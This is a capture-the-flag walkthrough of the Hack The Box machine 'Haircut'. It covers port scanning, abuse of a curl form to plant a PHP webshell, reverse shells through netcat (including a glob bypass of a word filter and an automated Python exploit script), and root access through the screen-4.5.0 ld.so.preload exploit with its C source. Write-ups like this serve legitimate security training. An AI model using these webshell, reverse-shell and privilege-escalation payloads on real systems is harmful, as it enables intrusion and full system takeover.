Haircut

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.24 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, it is the fastest mode of the nmap time template.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Tue Apr  5 19:58:02 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.24
Warning: 10.10.10.24 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.24
Host is up (0.061s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

# Nmap done at Tue Apr  5 19:58:26 2022 -- 1 IP address (1 host up) scanned in 23.18 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,80 10.10.10.24 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Tue Apr  5 19:59:31 2022 as: nmap -sCV -p22,80 -oN targeted 10.10.10.24
Nmap scan report for 10.10.10.24
Host is up (0.058s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
|   256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_  256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open  http    nginx 1.10.0 (Ubuntu)
|_http-title:  HTB Hairdresser 
|_http-server-header: nginx/1.10.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr  5 19:59:41 2022 -- 1 IP address (1 host up) scanned in 10.81 seconds

If we take a look at the website, we won't see much going on.

Let's try to enumerate directories, TXT files, and PHP files with gobuster.

gobuster dir -u http://10.10.10.24 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 -x txt,php

  • dir enumerates directories or files.

  • -u the target URL.

  • -w path to the wordlist.

  • -t number of current threads, in this case 200 threads.

  • -x file extensions to search for.

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.24/
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,php
[+] Timeout:                 10s
===============================================================
2022/04/06 12:40:16 Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 194] [--> http://10.10.10.24/uploads/]
/exposed.php          (Status: 200) [Size: 446]                                  
                                                                                 
===============================================================
2022/04/06 12:47:10 Finished
===============================================================

We see the /uploads folder, and the exposed.php file. We can't access the /uploads directory.

But, if we take a look at the exposed.php file, we'll see a page which will curl anything we put in the text field.

Exploitation

Method 1

The curl tool, has an option which saves the output to a file. We can create a file named index.php, which will contain a webshell. Then, we could have a webshell by requesting that file from the website, and saving the output into a file named webshell.php in the /uploads directory. First, let's create the index.php file in our current directory.

nano index.php

<?php
	echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
?>

Then set a simple HTTP server with python on the current directory.

python -m http.server 80

Then curl the file from the website.

http://10.10.14.13/index.php -o uploads/webshell.php

  • -o write to file instead of stdout.

If now we access the uploads/webshell.php file, we'll be able to execute commands on the remote machine with the cmd GET parameter.

http://10.10.10.24/uploads/webshell.php?cmd=ls -ll

To get a shell, let's set a netcat listener on port 4444.

nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

And execute the following command in the webshell, which will send us a reverse shell as the user www-data, and we'll be able to grab the user flag.

http://10.10.10.24/uploads/webshell.php?cmd=nc -e /bin/bash 10.10.14.13 4444

listening on [any] 4444 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.24] 47854
whoami
www-data
cat /home/maria/user.txt
8f529fd67a59783169d8e29ec4399554

Method 2

We could also get a reverse shell by executing the nc -e /bin/bash 10.10.14.13 4444 command with $() directly from the exposed.php file. The problem is that the website bans some words, such as nc or bash.

$(nc -e /bin/bash 10.10.14.13 4444)

We can bypass it by adding the ? character in some letters of the nc and bash words. This way, the machine will automatically replace the ? signs with the correct letters, and the command will be executed.

$(/bin/n? -e /bin/b?sh 10.10.14.13 4444)

listening on [any] 4444 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.24] 47856
whoami
www-data
cat /home/maria/user.txt
8f529fd67a59783169d8e29ec4399554

I made a python script which automates the entire process. If you are going to use it, just make sure to change the lhost variable to your IP address.

#!/usr/bin/env python3

from pwn import *
import requests
import threading

def def_handler(sig, frame):
    print("[!] Saliendo...")
    sys.exit(1)
    
#Ctrl+C
signal.signal(signal.SIGINT, def_handler)

lhost="10.10.14.13"
lport=4444

def makeRequest():
    payload = {
        "formurl": f"http://$(/bin/n? -e /bin/b?sh {lhost} {lport})",
        "submit": "Go"
    }
    r = requests.post("http://10.10.10.24/exposed.php", data=payload)
    

if __name__ == '__main__':
    try:
        threading.Thread(target=makeRequest, args=()).start()
    except Exception as e:
        log.error(str(e))

    shell = listen(lport, timeout=20).wait_for_connection()
    shell.interactive()

Privilege Escalation

First, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg

reset

Terminal type? xterm

Next, I export a few variables:

export TERM=xterm

export SHELL=bash

Finally, I run the following command in our local machine:

stty size

51 236

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

If we list the SUID binaries that exist in the machine, we'll see the /usr/bin/screen-4.5.0 binary.

find / -perm /4000 2>/dev/null

/bin/ntfs-3g
/bin/ping6
/bin/fusermount
/bin/su
/bin/mount
/bin/ping
/bin/umount
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/passwd
/usr/bin/screen-4.5.0
/usr/bin/chsh
/usr/bin/chfn
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic                                                                                                        
/usr/lib/dbus-1.0/dbus-daemon-launch-helper                                                                                                       
/usr/lib/snapd/snap-confine                                                                                                                       
/usr/lib/eject/dmcrypt-get-device                                                                                                                 
/usr/lib/openssh/ssh-keysign                                                                                                                      
/usr/lib/policykit-1/polkit-agent-helper-1

I found this exploit on exploitdb, which indicates how to get a shell as root with the screen binary with the SUID permission. First, let's create on our machine the libhax.c file, and add the following code.

nano libhax.c

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

Then, compile it.

gcc -fPIC -shared -ldl -o libhax.so libhax.c

libhax.c: In function ‘dropshell’:
libhax.c:7:5: warning: implicit declaration of function ‘chmod’ [-Wimplicit-function-declaration]
    7 |     chmod("/tmp/rootshell", 04755);
      |     ^~~~~

Now, let's create the rootshell.c file, which will give us the shell as root.

nano rootshell.c

#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}

And also compile it.

gcc -o rootshell rootshell.c

rootshell.c: In function ‘main’:
rootshell.c:3:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
    3 |     setuid(0);
      |     ^~~~~~
rootshell.c:4:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
    4 |     setgid(0);
      |     ^~~~~~
rootshell.c:5:5: warning: implicit declaration of function ‘seteuid’ [-Wimplicit-function-declaration]
    5 |     seteuid(0);
      |     ^~~~~~~
rootshell.c:6:5: warning: implicit declaration of function ‘setegid’ [-Wimplicit-function-declaration]
    6 |     setegid(0);
      |     ^~~~~~~
rootshell.c:7:5: warning: implicit declaration of function ‘execvp’ [-Wimplicit-function-declaration]
    7 |     execvp("/bin/sh", NULL, NULL);
      |     ^~~~~~
rootshell.c:7:5: warning: too many arguments to built-in function ‘execvp’ expecting 2 [-Wbuiltin-declaration-mismatch]

Then, we'll have to transfer the libhax.so file and rootshell files to the haircut machine. Let's set a simple HTTP server with python on the current directory.

python -m http.server 80

Then, on the victim machine, let's go to the /tmp directory, and download both files from our HTTP server.

cd /tmp

wget http://10.10.14.13/libhax.so

wget http://10.10.14.13/rootshell

Then go to the /etc directory on the victim machine and execute the following commands.

cd /etc

umask 000

screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"

screen -ls

Finally, if we execute the rootshell file of the /tmp folder, we'll get a shell as root, and all we have to do is reap the harvest and take the root flag.

/tmp/rootshell

# whoami
root
# cat /root/root.txt
038c68850e1de6c4a986492613447b77

Last updated

Was this helpful?